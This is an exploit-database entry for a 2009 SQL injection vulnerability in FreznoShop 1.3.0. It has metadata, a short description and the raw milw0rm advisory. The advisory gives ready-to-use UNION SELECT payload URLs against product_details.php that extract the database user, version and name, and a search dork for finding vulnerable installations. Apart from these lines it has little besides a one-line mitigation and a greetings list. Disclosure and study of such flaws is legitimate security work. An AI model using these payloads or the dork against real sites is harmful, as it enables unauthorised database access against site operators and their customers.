header-logo
Suggest Exploit
vendor:
FreznoShop
by:
NoGe
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FreznoShop
Affected Version From: 1.3.0
Affected Version To: 1.3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:freznoshop:freznoshop:1.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FreznoShop 1.3.0 SQL Injection Vulnerability

A SQL injection vulnerability exists in FreznoShop version 1.3.0. An attacker can send a specially crafted HTTP request to product_details.php with an id parameter containing malicious SQL code to execute arbitrary SQL commands on the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

======================================================================================


  [o] FreznoShop 1.3.0 SQL Injection Vulnerability

       Software : FreznoShop version 1.3.0
       Vendor   : http://sourceforge.net/projects/freznoshop/
       Download : http://sourceforge.net/project/platformdownload.php?group_id=86090
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


======================================================================================


  [o] Vulnerable file

       product_details.php



  [o] Exploit

       http://localhost/[path]/product_details.php?id=[SQL}
		product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11--
		product_details.php?id=-22%20union%20select%201,user(),version(),4,database(),6,7,8,9,10,11,12--



  [o] Dork

       "Powered by FreznoShop"


======================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3
       H312Y yooogy mousekill }^-^{ loqsa
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
======================================================================================

# milw0rm.com [2009-04-13]